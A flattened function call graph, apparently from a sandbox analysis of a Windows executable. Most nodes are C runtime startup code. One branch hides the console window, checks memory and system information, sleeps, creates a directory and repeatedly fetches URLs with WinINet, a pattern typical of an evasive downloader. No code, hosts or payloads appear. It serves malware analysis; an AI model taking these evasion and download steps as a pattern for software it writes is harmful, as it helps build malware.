18541->18542 18542->18539 18549 abf1fa EnterCriticalSection 18543->18549 18545 aba2d2 18546 aba2f3 18545->18546 18547 aba35c __fread_nolock 41 API calls 18545->18547 18550 aba354 18546->18550 18547->18546 18549->18545 18553 abf2af LeaveCriticalSection 18550->18553 18552 aba35a 18552->18539 18553->18552 18554 aa9e38 18555 aa9e44 CallCatchBlock 18554->18555 18580 aaa03a 18555->18580 18557 aa9e4b 18558 aa9fa4 18557->18558 18568 aa9e75 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 18557->18568 18622 aaa4d7 IsProcessorFeaturePresent 18558->18622 18560 aa9fab 18626 ab37e3 18560->18626 18563 ab37a7 _unexpected 21 API calls 18564 aa9fb9 18563->18564 18565 aa9e94 18566 aa9f15 18591 ab342e 18566->18591 18568->18565 18568->18566 18605 ab37bd 18568->18605 18570 aa9f1b 18595 aa3510 GetConsoleWindow ShowWindow GlobalMemoryStatusEx 18570->18595 18572 aa9f32 18611 aaa5f7 GetModuleHandleW 18572->18611 18575 aa9f40 18576 aa9f49 18575->18576 18613 ab3798 18575->18613 18616 aaa1ab 18576->18616 18581 aaa043 18580->18581 18629 aaa745 IsProcessorFeaturePresent 18581->18629 18585 aaa054 18590 aaa058 18585->18590 18639 ab54d2 18585->18639 18587 aaa06f 18587->18557 18590->18557 18592 ab343c 18591->18592 18593 ab3437 18591->18593 18592->18570 18713 ab3188 18593->18713 18596 aa354e 18595->18596 18597 aa357d Sleep 18595->18597 18596->18597 18599 aa3559 18596->18599 19008 aa31b0 18597->19008 19063 aa7950 18599->19063 18603 aa356d 18603->18572 18606 ab37d3 std::_Locinfo::_Locinfo_ctor CallCatchBlock 18605->18606 18606->18566 18607 ab62cf __Getctype 39 API calls 18606->18607 18610 ab5584 18607->18610 18608 ab1dc7 __FrameHandler3::FrameUnwindToState 39 API calls 18609 ab55ae 18608->18609 18610->18608 18612 aa9f3c 18611->18612 18612->18560 18612->18575 18614 ab35d5 _unexpected 21 API calls 18613->18614 18615 ab37a3 18614->18615 18615->18576 18617 aaa1b7 18616->18617 18618 aa9f52 18617->18618 20374 ab54e4 18617->20374 18618->18565 18620 aaa1c5 18621 aac98d ___scrt_uninitialize_crt 7 API calls 18620->18621 18621->18618 18623 aaa4ed __fread_nolock _unexpected 18622->18623 18624 aaa598 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18623->18624 18625 aaa5e3 _unexpected 18624->18625 18625->18560 18627 ab35d5 _unexpected 21 API calls 18626->18627 18628 aa9fb1 18627->18628 18628->18563 18630 aaa04f 18629->18630 18631 aac96e 18630->18631 18648 aada37 18631->18648 18634 aac977 18634->18585 18636 aac97f 18637 aac98a 18636->18637 18662 aada73 18636->18662 18637->18585 18704 ac17f3 18639->18704 18642 aac98d 18643 aac9a0 18642->18643 18644 aac996 18642->18644 18643->18590 18645 aacb06 ___vcrt_uninitialize_ptd 6 API calls 18644->18645 18646 aac99b 18645->18646 18647 aada73 ___vcrt_uninitialize_locks DeleteCriticalSection 18646->18647 18647->18643 18649 aada40 18648->18649 18651 aada69 18649->18651 18652 aac973 18649->18652 18666 aadc74 18649->18666 18653 aada73 ___vcrt_uninitialize_locks DeleteCriticalSection 18651->18653 18652->18634 18654 aacad3 18652->18654 18653->18652 18685 aadb85 18654->18685 18657 aacae8 18657->18636 18660 aacb03 18660->18636 18663 aada9d 18662->18663 18664 aada7e 18662->18664 18663->18634 18665 aada88 DeleteCriticalSection 18664->18665 18665->18663 18665->18665 18671 aadb3c 18666->18671 18669 aadcac InitializeCriticalSectionAndSpinCount 18670 aadc97 18669->18670 18670->18649 18672 aadb77 18671->18672 18673 aadb54 18671->18673 18672->18669 18672->18670 18673->18672 18677 aadaa2 18673->18677 18676 aadb69 GetProcAddress 18676->18672 18679 aadaae ___vcrt_FlsGetValue 18677->18679 18678 aadb22 18678->18672 18678->18676 18679->18678 18680 aadac4 LoadLibraryExW 18679->18680 18684 aadb04 LoadLibraryExW 18679->18684 18681 aadb29 18680->18681 18682 aadae2 GetLastError 18680->18682 18681->18678 18683 aadb31 FreeLibrary 18681->18683 18682->18679 18683->18678 18684->18679 18684->18681 18686 aadb3c ___vcrt_FlsGetValue 5 API calls 18685->18686 18687 aadb9f 18686->18687 18688 aadbb8 TlsAlloc 18687->18688 18689 aacadd 18687->18689 18689->18657 18690 aadc36 18689->18690 18691 aadb3c ___vcrt_FlsGetValue 5 API calls 18690->18691 18692 aadc50 18691->18692 18693 aadc6b TlsSetValue 18692->18693 18694 aacaf6 18692->18694 18693->18694 18694->18660 18695 aacb06 18694->18695 18696 aacb16 18695->18696 18697 aacb10 18695->18697 18696->18657 18699 aadbc0 18697->18699 18700 aadb3c ___vcrt_FlsGetValue 5 API calls 18699->18700 18701 aadbda 18700->18701 18702 aadbf2 TlsFree 18701->18702 18703 aadbe6 18701->18703 18702->18703 18703->18696 18705 ac1803 18704->18705 18706 aaa061 18704->18706 18705->18706 18708 ab6670 18705->18708 18706->18587 18706->18642 18710 ab6677 18708->18710 18709 ab66ba GetStdHandle 18709->18710 18710->18709 18711 ab671c 18710->18711 18712 ab66cd GetFileType 18710->18712 18711->18705 18712->18710 18714 ab3191 18713->18714 18717 ab31a7 18713->18717 18714->18717 18719 ab31b4 18714->18719 18716 ab319e 18716->18717 18736 ab331f 18716->18736 18717->18592 18720 ab31bd 18719->18720 18721 ab31c0 18719->18721 18720->18716 18744 abe937 18721->18744 18726 ab31dd 18771 ab320e 18726->18771 18727 ab31d1 18729 ab73d1 ___free_lconv_mon 14 API calls 18727->18729 18730 ab31d7 18729->18730 18730->18716 18732 ab73d1 ___free_lconv_mon 14 API calls 18733 ab3201 18732->18733 18734 ab73d1 ___free_lconv_mon 14 API calls 18733->18734 18735 ab3207 18734->18735 18735->18716 18741 ab3390 18736->18741 18742 ab332e 18736->18742 18737 abd8f1 WideCharToMultiByte _fread 18737->18742 18738 ab794f __dosmaperr 14 API calls 18738->18742 18739 ab3394 18740 ab73d1 ___free_lconv_mon 14 API calls 18739->18740 18740->18741 18741->18717 18742->18737 18742->18738 18742->18739 18742->18741 18743 ab73d1 ___free_lconv_mon 14 API calls 18742->18743 18743->18742 18745 abe940 18744->18745 18749 ab31c6 18744->18749 18793 ab638a 18745->18793 18750 abec36 GetEnvironmentStringsW 18749->18750 18751 abec4e 18750->18751 18764 ab31cb 18750->18764 18752 abd8f1 _fread WideCharToMultiByte 18751->18752 18753 abec6b 18752->18753 18754 abec80 18753->18754 18755 abec75 FreeEnvironmentStringsW 18753->18755 18756 ab830e std::_Locinfo::_Locinfo_ctor 15 API calls 18754->18756 18755->18764 18757 abec87 18756->18757 18758 abec8f 18757->18758 18759 abeca0 18757->18759 18761 ab73d1 ___free_lconv_mon 14 API calls 18758->18761 18760 abd8f1 _fread WideCharToMultiByte 18759->18760 18762 abecb0 18760->18762 18763 abec94 FreeEnvironmentStringsW 18761->18763 18765 abecbf 18762->18765 18766 abecb7 18762->18766 18763->18764 18764->18726 18764->18727 18768 ab73d1 ___free_lconv_mon 14 API calls 18765->18768 18767 ab73d1 ___free_lconv_mon 14 API calls 18766->18767 18769 abecbd FreeEnvironmentStringsW 18767->18769 18768->18769 18769->18764 18772 ab3223 18771->18772 18773 ab794f __dosmaperr 14 API calls 18772->18773 18774 ab324a 18773->18774 18775 ab3252 18774->18775 18784 ab325c 18774->18784 18776 ab73d1 ___free_lconv_mon 14 API calls 18775->18776 18792 ab31e4 18776->18792 18777 ab32b9 18778 ab73d1 ___free_lconv_mon 14 API calls 18777->18778 18778->18792 18779 ab794f __dosmaperr 14 API calls 18779->18784 18780 ab32c8 19002 ab32f0 18780->19002 18784->18777 18784->18779 18784->18780 18785 ab32e3 18784->18785 18787 ab73d1 ___free_lconv_mon 14 API calls 18784->18787 18993 ab55af 18784->18993 18788 ab130a __Getctype 11 API calls 18785->18788 18786 ab73d1 ___free_lconv_mon 14 API calls 18789 ab32d5 18786->18789 18787->18784 18790 ab32ef 18788->18790 18791 ab73d1 ___free_lconv_mon 14 API calls 18789->18791 18791->18792 18792->18732 18794 ab639b 18793->18794 18795 ab6395 18793->18795 18797 ab7ea3 __dosmaperr 6 API calls 18794->18797 18814 ab63a1 18794->18814 18796 ab7e64 __dosmaperr 6 API calls 18795->18796 18796->18794 18798 ab63b5 18797->18798 18799 ab794f __dosmaperr 14 API calls 18798->18799 18798->18814 18802 ab63c5 18799->18802 18800 ab1dc7 __FrameHandler3::FrameUnwindToState 39 API calls 18801 ab641f 18800->18801 18803 ab63cd 18802->18803 18804 ab63e2 18802->18804 18806 ab7ea3 __dosmaperr 6 API calls 18803->18806 18805 ab7ea3 __dosmaperr 6 API calls 18804->18805 18807 ab63ee 18805->18807 18810 ab63d9 18806->18810 18808 ab63f2 18807->18808 18809 ab6401 18807->18809 18812 ab7ea3 __dosmaperr 6 API calls 18808->18812 18813 ab60fd __dosmaperr 14 API calls 18809->18813 18811 ab73d1 ___free_lconv_mon 14 API calls 18810->18811 18811->18814 18812->18810 18815 ab640c 18813->18815 18814->18800 18817 ab63a6 18814->18817 18816 ab73d1 ___free_lconv_mon 14 API calls 18815->18816 18816->18817 18818 abe742 18817->18818 18819 abe897 ctype 39 API calls 18818->18819 18820 abe76c 18819->18820 18841 abe4c9 18820->18841 18824 abe796 18825 abe79e 18824->18825 18826 abe7ac 18824->18826 18828 ab73d1 ___free_lconv_mon 14 API calls 18825->18828 18855 abe992 18826->18855 18829 abe785 18828->18829 18829->18749 18831 abe7e4 18832 ab1ea8 __dosmaperr 14 API calls 18831->18832 18833 abe7e9 18832->18833 18836 ab73d1 ___free_lconv_mon 14 API calls 18833->18836 18834 abe82b 18835 abe874 18834->18835 18866 abe3bb 18834->18866 18839 ab73d1 ___free_lconv_mon 14 API calls 18835->18839 18836->18829 18837 abe7ff 18837->18834 18840 ab73d1 ___free_lconv_mon 14 API calls 18837->18840 18839->18829 18840->18834 18874 ab1ebb 18841->18874 18844 abe4ea GetOEMCP 18846 abe513 18844->18846 18845 abe4fc 18845->18846 18847 abe501 GetACP 18845->18847 18846->18829 18848 ab830e 18846->18848 18847->18846 18849 ab834c 18848->18849 18853 ab831c __dosmaperr 18848->18853 18851 ab1ea8 __dosmaperr 14 API calls 18849->18851 18850 ab8337 HeapAlloc 18852 ab834a 18850->18852 18850->18853 18851->18852 18852->18824 18853->18849 18853->18850 18854 ab2c09 std::_Facet_Register 2 API calls 18853->18854 18854->18853 18856 abe4c9 41 API calls 18855->18856 18858 abe9b2 18856->18858 18857 abeab7 18860 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18857->18860 18858->18857 18859 abe9ef IsValidCodePage 18858->18859 18865 abea0a __fread_nolock 18858->18865 18859->18857 18861 abea01 18859->18861 18862 abe7d9 18860->18862 18863 abea2a GetCPInfo 18861->18863 18861->18865 18862->18831 18862->18837 18863->18857 18863->18865 18890 abe59d 18865->18890 18867 abe3c7 CallCatchBlock 18866->18867 18967 ab13aa EnterCriticalSection 18867->18967 18869 abe3d1 18968 abe408 18869->18968 18875 ab1ed9 18874->18875 18876 ab1ed2 18874->18876 18875->18876 18877 ab62cf __Getctype 39 API calls 18875->18877 18876->18844 18876->18845 18878 ab1efa 18877->18878 18882 ab835c 18878->18882 18883 ab1f10 18882->18883 18884 ab836f 18882->18884 18886 ab83ba 18883->18886 18884->18883 18885 ac043e __Getctype 39 API calls 18884->18885 18885->18883 18887 ab83cd 18886->18887 18888 ab83e2 18886->18888 18887->18888 18889 abe97f ctype 39 API calls 18887->18889 18888->18876 18889->18888 18891 abe5c5 GetCPInfo 18890->18891 18900 abe68e 18890->18900 18892 abe5dd 18891->18892 18891->18900 18901 abb25b 18892->18901 18893 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18895 abe740 18893->18895 18895->18857 18899 abb54b 43 API calls 18899->18900 18900->18893 18902 ab1ebb ctype 39 API calls 18901->18902 18903 abb27b 18902->18903 18921 abd837 18903->18921 18905 abb337 18907 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18905->18907 18906 abb32f 18924 aa9cef 18906->18924 18910 abb35a 18907->18910 18908 abb2a8 18908->18905 18908->18906 18909 ab830e std::_Locinfo::_Locinfo_ctor 15 API calls 18908->18909 18912 abb2cd __fread_nolock __alloca_probe_16 18908->18912 18909->18912 18916 abb54b 18910->18916 18912->18906 18913 abd837 ctype MultiByteToWideChar 18912->18913 18914 abb316 18913->18914 18914->18906 18915 abb31d GetStringTypeW 18914->18915 18915->18906 18917 ab1ebb ctype 39 API calls 18916->18917 18918 abb55e 18917->18918 18933 abb35c 18918->18933 18928 abd79f 18921->18928 18925 aa9d0a 18924->18925 18926 aa9cf9 18924->18926 18925->18905 18926->18925 18930 ab088a 18926->18930 18929 abd7b0 MultiByteToWideChar 18928->18929 18929->18908 18931 ab73d1 ___free_lconv_mon 14 API calls 18930->18931 18932 ab08a2 18931->18932 18932->18925 18934 abb377 ctype 18933->18934 18935 abd837 ctype MultiByteToWideChar 18934->18935 18939 abb3bb 18935->18939 18936 abb536 18937 aaa215 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18936->18937 18938 abb549 18937->18938 18938->18899 18939->18936 18940 ab830e std::_Locinfo::_Locinfo_ctor 15 API calls 18939->18940 18942 abb3e1 __alloca_probe_16 18939->18942 18953 abb489 18939->18953 18940->18942 18941 aa9cef __freea 14 API calls 18941->18936 18943 abd837 ctype MultiByteToWideChar 18942->18943 18942->18953 18944 abb42a 18943->18944 18944->18953 18961 ab8022 18944->18961 18953->18941 18962 ab7b52 std::_Locinfo::_Locinfo_ctor 5 API calls 18961->18962 18967->18869 18978 ab0cda 18968->18978 18970 abe42a 18971 ab0cda __fread_nolock 39 API calls 18970->18971 18972 abe449 18971->18972 18973 abe3de 18972->18973 18974 ab73d1 ___free_lconv_mon 14 API calls 18972->18974 18975 abe3fc 18973->18975 18974->18973 18992 ab13f2 LeaveCriticalSection 18975->18992 18977 abe3ea 18977->18835 18979 ab0ceb 18978->18979 18988 ab0ce7 ctype 18978->18988 18980 ab0cf2 18979->18980 18983 ab0d05 __fread_nolock 18979->18983 18981 ab1ea8 __dosmaperr 14 API calls 18980->18981 18982 ab0cf7 18981->18982 18984 ab12dd __wsopen_s 39 API calls 18982->18984 18985 ab0d3c 18983->18985 18986 ab0d33 18983->18986 18983->18988 18984->18988 18985->18988 18990 ab1ea8 __dosmaperr 14 API calls 18985->18990 18987 ab1ea8 __dosmaperr 14 API calls 18986->18987 18989 ab0d38 18987->18989 18988->18970 18991 ab12dd __wsopen_s 39 API calls 18989->18991 18990->18989 18991->18988 18992->18977 18994 ab55cb 18993->18994 18995 ab55bd 18993->18995 18996 ab1ea8 __dosmaperr 14 API calls 18994->18996 18995->18994 19000 ab55e3 18995->19000 18997 ab55d3 18996->18997 18998 ab12dd __wsopen_s 39 API calls 18997->18998 18999 ab55dd 18998->18999 18999->18784 19000->18999 19001 ab1ea8 __dosmaperr 14 API calls 19000->19001 19001->18997 19003 ab32fd 19002->19003 19007 ab32ce 19002->19007 19004 ab3314 19003->19004 19006 ab73d1 ___free_lconv_mon 14 API calls 19003->19006 19005 ab73d1 ___free_lconv_mon 14 API calls 19004->19005 19005->19007 19006->19003 19007->18786 19009 aa31d2 __wsopen_s 19008->19009 19079 aa2ec0 GetSystemInfo 19009->19079 19012 aa322a InternetOpenUrlA 19014 aa324c 19012->19014 19015 aa3274 19012->19015 19013 aa320c 19016 aa7950 68 API calls 19013->19016 19017 aa7950 68 API calls 19014->19017 19151 aa4c10 19015->19151 19019 aa3220 19016->19019 19020 aa3260 19017->19020 19019->19012 19021 aa326a InternetCloseHandle 19020->19021 19021->19015 19022 aa3289 19064 aa7982 char_traits 19063->19064 19065 aa5710 40 API calls 19064->19065 19071 aa7a17 char_traits 19065->19071 19066 aa63c0 40 API calls 19067 aa7c35 19066->19067 19068 aa56a0 40 API calls 19067->19068 19069 aa7c4a 19068->19069 19069->18603 19070 aa6230 67 API calls 19072 aa7a2d char_traits 19070->19072 19071->19070 19071->19072 19072->19066 19080 aa2efe CreateDirectoryA 19079->19080 19081 aa3195 Sleep InternetOpenA 19079->19081 19225 aa5240 19080->19225 19081->19012 19081->19013 19083 aa2f18 19084 aa5240 std::ios_base::failure::failure 40 API calls 19083->19084 19085 aa2f2c 19084->19085 19229 aa2cb0 InternetOpenA 19085->19229 19089 aa2f4c 19090 aa51d0 task 39 API calls 19089->19090 19091 aa2f5b 19090->19091 19092 aa5240 std::ios_base::failure::failure 40 API calls 19091->19092 19093 aa2f68 19092->19093 19094 aa5240 std::ios_base::failure::failure 40 API calls 19093->19094 19095 aa2f7c 19094->19095 19096 aa2cb0 105 API calls 19095->19096 19097 aa2f8d 19096->19097 19098 aa51d0 task 39 API calls 19097->19098 19099 aa2f9c 19098->19099 19100 aa51d0 task 39 API calls 19099->19100 19101 aa2fab 19100->19101 19102 aa5240 std::ios_base::failure::failure 40 API calls 19101->19102 19103 aa2fbb 19102->19103 19104 aa5240 std::ios_base::failure::failure 40 API calls 19103->19104 19105 aa2fd2 19104->19105 19106 aa2cb0 105 API calls 19105->19106 19107 aa2fe9 19106->19107 19108 aa51d0 task 39 API calls 19107->19108 19109 aa2ffb 19108->19109 19110 aa51d0 task 39 API calls 19109->19110 19111 aa300d 19110->19111 19112 aa5240 std::ios_base::failure::failure 40 API calls 19111->19112 19113 aa301d 19112->19113 19114 aa5240 std::ios_base::failure::failure 40 API calls 19113->19114 19115 aa3034 19114->19115 19152 aa4c3b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 19151->19152 19383 aa62d0 19152->19383 19158 aa4cd7 19159 aa4cf1 19158->19159 19400 aa63c0 19158->19400 19159->19022 19226 aa526b std::ios_base::failure::failure 19225->19226 19249 aa6760 19226->19249 19228 aa529d Concurrency::cancellation_token_source::~cancellation_token_source 19228->19083 19230 aa2cee 19229->19230 19231 aa2de3 19229->19231 19311 aa2b40 19230->19311 19246 aa51d0 19231->19246 19233 aa2cfb std::runtime_error::runtime_error 19234 aa2d14 InternetOpenUrlA 19233->19234 19235 aa51d0 task 39 API calls 19234->19235 19236 aa2d2a 19235->19236 19237 aa2dd9 InternetCloseHandle 19236->19237 19321 aa4bb0 19236->19321 19237->19231 19239 aa2dbd InternetCloseHandle 19241 aa2e00 70 API calls 19239->19241 19240 aa2d73 InternetReadFile 19242 aa2db2 19240->19242 19243 aa2d49 19240->19243 19241->19237 19244 aa4b00 71 API calls 19242->19244 19243->19239 19243->19240 19243->19242 19245 aa4d10 68 API calls 19243->19245 19244->19239 19245->19243 19379 aa65f0 19246->19379 19248 aa51df task 19248->19089 19250 aa6770 std::runtime_error::runtime_error char_traits 19249->19250 19253 aa6790 19250->19253 19252 aa6789 19252->19228 19254 aa67e8 19253->19254 19256 aa67a4 std::ios_base::failure::failure task std::runtime_error::runtime_error 19253->19256 19257 aa8090 19254->19257 19256->19252 19258 aa80a1 std::ios_base::failure::failure 19257->19258 19260 aa80ab std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source 19258->19260 19265 aa1550 19258->19265 19268 aa7500 19260->19268 19262 aa80dd std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source std::runtime_error::runtime_error 19264 aa8132 std::ios_base::failure::failure 19262->19264 19272 aa7530 19262->19272 19264->19256 19275 aa915d 19265->19275 19269 aa7510 allocator 19268->19269 19286 aa8330 19269->19286 19303 aa82c0 19272->19303 19274 aa7544 19274->19264 19280 aa908c 19275->19280 19279 aa917c 19281 aa11b0 std::exception::exception 39 API calls 19280->19281 19282 aa909e 19281->19282 19283 aab163 19282->19283 19284 aab1aa RaiseException 19283->19284 19285 aab17d 19283->19285 19284->19279 19285->19284 19287 aa834a 19286->19287 19288 aa833c 19286->19288 19290 aa7519 19287->19290 19300 aa1490 19287->19300 19292 aa8af0 19288->19292 19290->19262 19293 aa8b0c 19292->19293 19294 aa8b07 19292->19294 19296 aa1490 _Allocate RaiseException EnterCriticalSection LeaveCriticalSection 19293->19296 19295 aa1400 Concurrency::cancel_current_task RaiseException 19294->19295 19295->19293 19297 aa8b15 19296->19297 19298 ab12ed _Allocate 39 API calls 19297->19298 19299 aa8b30 19297->19299 19298->19297 19299->19290 19301 aa9d12 std::_Facet_Register RaiseException EnterCriticalSection LeaveCriticalSection 19300->19301 19302 aa149c 19301->19302 19302->19290 19304 aa82ee _MallocaArrayHolder 19303->19304 19305 aa82e1 19303->19305 19304->19274 19307 aa14b0 19305->19307 19308 aa14ee 19307->19308 19309 ab12ed _Allocate 39 API calls 19308->19309 19310 aa1509 19308->19310 19309->19308 19310->19304 19312 aa2b6b Concurrency::cancellation_token_source::~cancellation_token_source 19311->19312 19325 aa4f00 19312->19325 19314 aa2c20 std::ios_base::failure::failure 19329 aa4ee0 19314->19329 19315 aa2b93 std::runtime_error::runtime_error 19315->19314 19332 aa5060 19315->19332 19318 aa51d0 task 39 API calls 19319 aa2c97 19318->19319 19319->19233 19322 aa4bcb std::runtime_error::runtime_error 19321->19322 19323 aa4c10 100 API calls 19322->19323 19324 aa4bd4 19323->19324 19324->19243 19326 aa4f1a 19325->19326 19336 aa7e70 19326->19336 19328 aa4f2a 19328->19315 19330 aa6430 Concurrency::cancellation_token_source::~cancellation_token_source 39 API calls 19329->19330 19331 aa2c88 19330->19331 19331->19318 19333 aa50c4 19332->19333 19335 aa507d task std::runtime_error::runtime_error 19332->19335 19371 aa7f20 19333->19371 19335->19315 19337 aa7eab std::ios_base::failure::failure 19336->19337 19339 aa7efc Concurrency::cancellation_token_source::~cancellation_token_source 19337->19339 19342 aa8740 19337->19342 19339->19328 19340 aa7ebd 19348 aa8370 19340->19348 19343 aa874f 19342->19343 19344 aa8759 19343->19344 19352 aa88a0 19343->19352 19355 aa8950 19344->19355 19349 aa8389 19348->19349 19350 aa837f 19348->19350 19349->19339 19364 aa6430 19350->19364 19353 aa915d std::_Xinvalid_argument 40 API calls 19352->19353 19354 aa88ad 19353->19354 19354->19344 19356 aa8983 Concurrency::cancellation_token_source::~cancellation_token_source 19355->19356 19359 aa8a90 19356->19359 19360 aa8cf0 allocator RaiseException 19359->19360 19361 aa8aa0 19360->19361 19362 aa8330 _Allocate 40 API calls 19361->19362 19363 aa8765 19362->19363 19363->19340 19365 aa6474 Concurrency::cancellation_token_source::~cancellation_token_source 19364->19365 19367 aa64b3 19365->19367 19368 aa7300 19365->19368 19367->19349 19369 aa82c0 allocator 39 API calls 19368->19369 19370 aa7317 19369->19370 19370->19367 19372 aa7f40 std::ios_base::failure::failure 19371->19372 19373 aa1550 std::ios_base::failure::failure 40 API calls 19372->19373 19374 aa7f4d std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source 19372->19374 19373->19374 19375 aa7500 allocator 40 API calls 19374->19375 19376 aa7f88 Concurrency::cancellation_token_source::~cancellation_token_source std::runtime_error::runtime_error 19375->19376 19377 aa7530 allocator 39 API calls 19376->19377 19378 aa7ff7 std::ios_base::failure::failure 19376->19378 19377->19378 19378->19335 19380 aa6616 task ctype Concurrency::cancellation_token_source::~cancellation_token_source 19379->19380 19381 aa665a task 19380->19381 19382 aa7530 allocator 39 API calls 19380->19382 19381->19248 19382->19381 19384 aa62fb Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 19383->19384 19404 aa7270 19384->19404 19387 aa5f70 19615 aa70a0 19387->19615 19389 aa5f94 19620 aa5d50 19389->19620 19391 aa4cb9 19392 aa5e90 19391->19392 19393 aa5ebb 19392->19393 19399 aa5eb7 std::ios_base::_Ios_base_dtor 19392->19399 19631 aa9782 19393->19631 19396 aa5d50 39 API calls 19399->19158 19401 aa63d4 std::ios_base::good 19400->19401 19413 aa2940 19404->19413 19408 aa729c 19409 aa63c0 40 API calls 19408->19409 19411 aa72b7 19408->19411 19409->19411 19410 aa4c7b 19410->19387 19411->19410 19424 aa959c 19411->19424 19429 aa2750 19413->19429 19418 aa29c6 19420 aa76a0 19418->19420 19421 aa76ca std::ios_base::getloc 19420->19421 19525 aa7850 19421->19525 19423 aa76e8 std::ios_base::_Ios_base_dtor ctype 19423->19408 19425 aa8fe2 std::_Lockit::_Lockit 7 API calls 19424->19425 19426 aa95ac 19425->19426 19427 aa903a std::_Lockit::~_Lockit 2 API calls 19426->19427 19428 aa95ea 19427->19428 19428->19410 19444 aa26b0 19429->19444 19432 aa9d12 19433 aa9d17 ___std_exception_copy 19432->19433 19434 aa29b2 19433->19434 19435 ab2c09 std::_Facet_Register 2 API calls 19433->19435 19437 aa9d33 std::_Facet_Register 19433->19437 19434->19418 19441 aa1f20 19434->19441 19435->19433 19436 aaa3a9 stdext::threads::lock_error::lock_error 19438 aab163 Concurrency::cancel_current_task RaiseException 19436->19438 19437->19436 19440 aab163 Concurrency::cancel_current_task RaiseException 19437->19440 19439 aaa3c6 19438->19439 19440->19436 19462 aa9382 19441->19462 19443 aa1f43 19443->19418 19445 aa26d9 19444->19445 19446 aa273c 19444->19446 19447 aab163 Concurrency::cancel_current_task RaiseException 19445->19447 19448 aa26ea std::make_error_code 19445->19448 19446->19432 19447->19448 19452 aa2650 19448->19452 19451 aab163 Concurrency::cancel_current_task RaiseException 19451->19446 19455 aa1950 19452->19455 19456 aa5240 std::ios_base::failure::failure 40 API calls 19455->19456 19457 aa197a 19456->19457 19458 aa1880 std::ios_base::failure::failure 40 API calls 19457->19458 19459 aa1995 19458->19459 19460 aa51d0 task 39 API calls 19459->19460 19461 aa19a4 19460->19461 19461->19451 19463 aa938e __EH_prolog3 19462->19463 19474 aa8fe2 19463->19474 19468 aa93ac 19486 aa950a 19468->19486 19469 aa940a std::locale::_Init 19469->19443 19473 aa93ca 19494 aa903a 19473->19494 19475 aa8ff8 19474->19475 19476 aa8ff1 19474->19476 19477 aa8ff6 19475->19477 19506 aa9a57 EnterCriticalSection 19475->19506 19501 ab1409 19476->19501 19477->19473 19480 aa94e7 19477->19480 19481 aa9d12 std::_Facet_Register 3 API calls 19480->19481 19482 aa94f2 19481->19482 19483 aa9506 19482->19483 19507 aa9216 19482->19507 19483->19468 19487 aa93b4 19486->19487 19488 aa9516 19486->19488 19490 aa92da 19487->19490 19510 aa9adb 19488->19510 19491 aa92e8 19490->19491 19493 aa92f4 ctype ___std_exception_copy 19490->19493 19492 ab088a ___std_exception_copy 14 API calls 19491->19492 19491->19493 19492->19493 19493->19473 19495 ab1417 19494->19495 19496 aa9044 19494->19496 19524 ab13f2 LeaveCriticalSection 19495->19524 19500 aa9057 19496->19500 19523 aa9a65 LeaveCriticalSection 19496->19523 19499 ab141e 19499->19469 19500->19469 19502 ab80bb std::_Locinfo::_Locinfo_ctor 5 API calls 19501->19502 19503 ab140e 19502->19503 19504 ab13aa std::_Lockit::_Lockit EnterCriticalSection 19503->19504 19505 ab1415 19504->19505 19505->19477 19506->19477 19508 aa92da _Yarn 14 API calls 19507->19508 19509 aa9250 19508->19509 19509->19468 19511 aa9aeb EncodePointer 19510->19511 19512 ab1dc7 19510->19512 19511->19487 19511->19512 19513 abb6ca _unexpected EnterCriticalSection LeaveCriticalSection 19512->19513 19514 ab1dcc 19513->19514 19515 ab1dd7 19514->19515 19516 abb70f _unexpected 39 API calls 19514->19516 19517 ab1de1 IsProcessorFeaturePresent 19515->19517 19522 ab1e00 19515->19522 19516->19515 19519 ab1ded 19517->19519 19518 ab37a7 _unexpected 21 API calls 19521 ab1e0a 19518->19521 19520 ab10e1 _unexpected 8 API calls 19519->19520 19520->19522 19522->19518 19523->19500 19524->19499 19526 aa8fe2 std::_Lockit::_Lockit 7 API calls 19525->19526 19527 aa7875 19526->19527 19539 aa1e00 19527->19539 19529 aa788e 19538 aa78ac 19529->19538 19545 aa22d0 19529->19545 19530 aa903a std::_Lockit::~_Lockit 2 API calls 19531 aa7936 19530->19531 19531->19423 19534 aa78c9 19555 aa1b90 19534->19555 19535 aa78d0 19559 aa9350 19535->19559 19538->19530 19540 aa1e11 19539->19540 19541 aa1e45 19539->19541 19542 aa8fe2 std::_Lockit::_Lockit 7 API calls 19540->19542 19541->19529 19543 aa1e1b 19542->19543 19544 aa903a std::_Lockit::~_Lockit 2 API calls 19543->19544 19544->19541 19546 aa2393 19545->19546 19547 aa22fc 19545->19547 19546->19534 19546->19535 19547->19546 19548 aa9d12 std::_Facet_Register 3 API calls 19547->19548 19550 aa230f 19548->19550 19549 aa2357 19549->19546 19574 aa1d00 19549->19574 19550->19549 19562 aa1c30 19550->19562 19556 aa1b9e std::bad_alloc::bad_alloc 19555->19556 19557 aab163 Concurrency::cancel_current_task RaiseException 19556->19557 19558 aa1bac 19557->19558 19558->19538 19560 aa9d12 std::_Facet_Register 3 API calls 19559->19560 19561 aa935b 19560->19561 19561->19538 19563 aa8fe2 std::_Lockit::_Lockit 7 API calls 19562->19563 19564 aa1c56 _Yarn 19563->19564 19565 aa1ccf 19564->19565 19566 aa1cbd 19564->19566 19600 aa919d 19565->19600 19591 aa9482 19566->19591 19569 aa1cca 19570 aa2270 19569->19570 19571 aa2298 std::bad_exception::bad_exception 19570->19571 19605 aa23e0 19571->19605 19608 aa94cd 19574->19608 19579 aa4f80 14 API calls 19580 aa1d3e 19579->19580 19581 aa4f80 14 API calls 19580->19581 19582 aa1d49 19581->19582 19583 aa4f80 14 API calls 19582->19583 19584 aa1d54 19583->19584 19585 aa4f80 14 API calls 19584->19585 19586 aa1d5f 19585->19586 19587 aa4f80 14 API calls 19586->19587 19588 aa1d6a 19587->19588 19589 aa903a std::_Lockit::~_Lockit 2 API calls 19588->19589 19592 ab1680 